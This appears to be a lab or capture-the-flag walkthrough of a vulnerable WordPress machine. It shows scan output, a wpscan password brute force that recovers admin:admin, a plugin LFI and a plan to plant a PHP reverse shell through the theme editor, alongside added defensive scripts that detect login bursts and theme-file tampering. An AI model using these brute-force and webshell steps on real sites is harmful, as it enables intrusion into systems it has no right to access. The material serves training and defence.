PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.158
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
| 256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
|_ 256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Seems like there is another WordPress website; Medium already has 4 WordPress machines.
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u http://192.168.158.50/ -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd (Status: 403) [Size: 298]
/.htaccess (Status: 403) [Size: 298]
/.hta (Status: 403) [Size: 293]
/index.html (Status: 200) [Size: 81]
/javascript (Status: 301) [Size: 321] [--> http://192.168.158.50/javascript/]
/LICENSE (Status: 200) [Size: 1672]
/robots.txt (Status: 200) [Size: 1451]
/server-status (Status: 403) [Size: 302]
/upload (Status: 301) [Size: 317] [--> http://192.168.158.50/upload/]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.158.50/wordpress/]
Also, it seems like some SQL database info is leaked under /upload.
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url http://192.168.158.50/wordpress/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.158.50/wordpress/ [192.168.158.50]
[+] Started: Sat Jul 16 08:37:53 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.158.50/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.158.50/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.158.50/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.158.50/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
| - http://192.168.158.50/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
[+] WordPress theme in use: twentyfourteen
| Location: http://192.168.158.50/wordpress/wp-content/themes/twentyfourteen/
| Latest Version: 3.4
| Last Updated: 2022-05-24T00:00:00.000Z
| Style URL: http://192.168.158.50/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
|
| Found By: Css Style In Homepage (Passive Detection)
|
| The version could not be determined.
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mail-masta
| Location: http://192.168.158.50/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.158.50/wordpress/wp-content/plugins/mail-masta/readme.txt
Continuing to enumerate users:
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url http://192.168.158.50/wordpress/ --enumerate u
<...SNIPPET...>
[i] User(s) Identified:
[+] btrisk
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
As expected, the plugin mail-masta 1.0 has an LFI. From both the username enumeration in wpscan and the LFI we know there is a user btrisk. However, after a long wpscan brute force we end up with the credential admin:admin.
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url http://192.168.158.50/wordpress/ -U admin -P /usr/share/wordlists/rockyou.txt
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - admin / admin
All Found
Progress Time: 00:00:57 < > (40 / 28688) 0.13% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: admin
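The attack above is only quiet because xmlrpc.php's system.multicall packs many guesses into each POST, so a rate rule on the web server log needs a low threshold. The following detector is an added example (not part of the original write-up): it parses Apache "combined" access-log lines, counts POSTs to xmlrpc.php and wp-login.php per source address in a sliding window, and flags the address once the count crosses a threshold. The log lines are constructed for the example; the /wordpress/ prefix is taken from the post, and the WPScan user-agent string is only illustrative, since a user agent is trivially changed and the request rate is the signal to rely on.

```python
"""Detect WordPress XML-RPC / wp-login password-guessing bursts in Apache access logs.

Added example, not from the original post. Assumes the Apache "combined" log format
and a WordPress install under /wordpress/ (as in the post).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log format: ip ident user [ts] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"$'
)

# Endpoints that accept credentials. xmlrpc.php also accepts system.multicall, which
# lets one POST carry hundreds of guesses, so even a modest POST rate is suspicious.
LOGIN_PATHS = ("/xmlrpc.php", "/wp-login.php")


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, ua; None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec


def detect_login_bursts(lines, threshold=10, window=timedelta(seconds=60)):
    """Flag source IPs that POST to a login endpoint `threshold` or more times within
    any sliding `window`. Returns {ip: (peak_count, first_ts, last_ts)}."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"].endswith(LOGIN_PATHS):
            per_ip[rec["ip"]].append(rec["ts"])

    alerts = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):          # two-pointer sliding window
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = (peak, stamps[0], stamps[-1])
    return alerts


def _constructed_log():
    """Constructed sample: one scanner hammering xmlrpc.php plus two benign clients."""
    base = datetime(2022, 7, 16, 8, 40, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{m} {p} HTTP/1.1" {st} {sz} "-" "{ua}"'
    stamp = lambda d: d.strftime("%d/%b/%Y:%H:%M:%S %z")
    lines = [fmt.format(ip="10.0.0.7", ts=stamp(base), m="GET", p="/wordpress/",
                        st=200, sz=6204, ua="Mozilla/5.0")]
    for i in range(12):  # twelve multicall POSTs in twelve seconds (constructed)
        lines.append(fmt.format(ip="192.168.49.158", ts=stamp(base + timedelta(seconds=5 + i)),
                                m="POST", p="/wordpress/xmlrpc.php", st=200, sz=3711,
                                ua="WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"))
    for i in range(2):   # a benign low-rate xmlrpc client, two minutes apart
        lines.append(fmt.format(ip="10.0.0.9", ts=stamp(base + timedelta(minutes=2 * i)),
                                m="POST", p="/wordpress/xmlrpc.php", st=200, sz=512,
                                ua="WordPressApp/1.0"))
    return lines


SAMPLE_LINES = _constructed_log()

if __name__ == "__main__":
    for ip, (count, first, last) in detect_login_bursts(SAMPLE_LINES).items():
        print(f"ALERT {ip}: {count} login POSTs between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

Run against a real log with `detect_login_bursts(open("/var/log/apache2/access.log"))`; the threshold and window should be tuned to the site, and the same counter is a good candidate for a fail2ban filter. Disabling xmlrpc.php entirely (or at least `system.multicall`) when nothing legitimate uses it removes the amplification that makes this attack cheap.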
Let’s log in at /wordpress/wp-admin/. Then we can go to the Appearance > Editor tab, where we can edit code. We will be looking for the Main Index Template (index.php) to avoid headaches, and then paste php-reverse-shell.php into it so we can simply visit /wordpress/index.php.
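The step above depends on the in-browser theme editor being available, and it leaves a modified file in the theme directory. On the defensive side both are easy to catch: WordPress's `DISALLOW_FILE_EDIT` constant removes Appearance > Editor from wp-admin, and a SHA-256 baseline of the theme's PHP files shows exactly which file was altered or dropped. The script below is an added example (not from the original write-up); it assumes the standard WordPress layout (wp-config.php at the site root, themes under wp-content/themes) and builds a small constructed fixture in a temporary directory to show both checks.

```python
"""Detect tampering with WordPress theme files and verify the file editor is disabled.

Added example, not from the original post. Assumes a standard WordPress layout:
wp-config.php at the site root and themes under wp-content/themes/.
"""
import hashlib
import re
import tempfile
from pathlib import Path

THEME_GLOB = "wp-content/themes/**/*.php"


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def theme_baseline(site_root):
    """Map each theme PHP file (path relative to the site root) to its SHA-256.
    Take this snapshot on a known-good install and store it off the web host."""
    root = Path(site_root)
    return {str(p.relative_to(root)): sha256_file(p) for p in sorted(root.glob(THEME_GLOB))}


def theme_diff(site_root, baseline):
    """Compare the live tree against a saved baseline.
    Returns {"modified": [...], "added": [...], "removed": [...]} (sorted lists)."""
    current = theme_baseline(site_root)
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


# define('DISALLOW_FILE_EDIT', true); removes Appearance > Editor from wp-admin.
DISALLOW_RE = re.compile(r"""define\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)""", re.I)


def file_editor_disabled(site_root):
    """True if wp-config.php defines DISALLOW_FILE_EDIT as true on a non-commented line."""
    cfg = Path(site_root) / "wp-config.php"
    if not cfg.exists():
        return False
    for line in cfg.read_text(errors="replace").splitlines():
        code = line.split("//", 1)[0].split("#", 1)[0]   # strip line comments
        if DISALLOW_RE.search(code):
            return True
    return False


def build_demo_site(site_root):
    """Constructed fixture: a minimal install whose editor is still enabled
    (the DISALLOW_FILE_EDIT line is present but commented out)."""
    theme = Path(site_root) / "wp-content" / "themes" / "twentyfourteen"
    theme.mkdir(parents=True)
    (theme / "index.php").write_text("<?php get_header(); get_footer();\n")
    (theme / "functions.php").write_text("<?php // theme functions\n")
    (Path(site_root) / "wp-config.php").write_text(
        "<?php\n// define('DISALLOW_FILE_EDIT', true);\ndefine('DB_NAME', 'wordpress');\n")


def run_demo():
    """End-to-end demo in a temp dir: snapshot, simulate an edit through the theme
    editor plus one dropped file, then report. Returns (diff, editor_disabled)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_site(tmp)
        baseline = theme_baseline(tmp)
        theme = Path(tmp) / "wp-content" / "themes" / "twentyfourteen"
        (theme / "index.php").write_text("<?php /* edited in Appearance > Editor */ get_header();\n")
        (theme / "dropped.php").write_text("<?php // new file\n")
        return theme_diff(tmp, baseline), file_editor_disabled(tmp)


if __name__ == "__main__":
    diff, disabled = run_demo()
    print("theme changes:", diff)
    print("file editor disabled:", disabled)
```

In production the baseline should be regenerated only on deliberate theme or plugin updates, and the comparison scheduled (cron, or a file-integrity tool such as AIDE) so a changed index.php is reported within minutes rather than found during incident response.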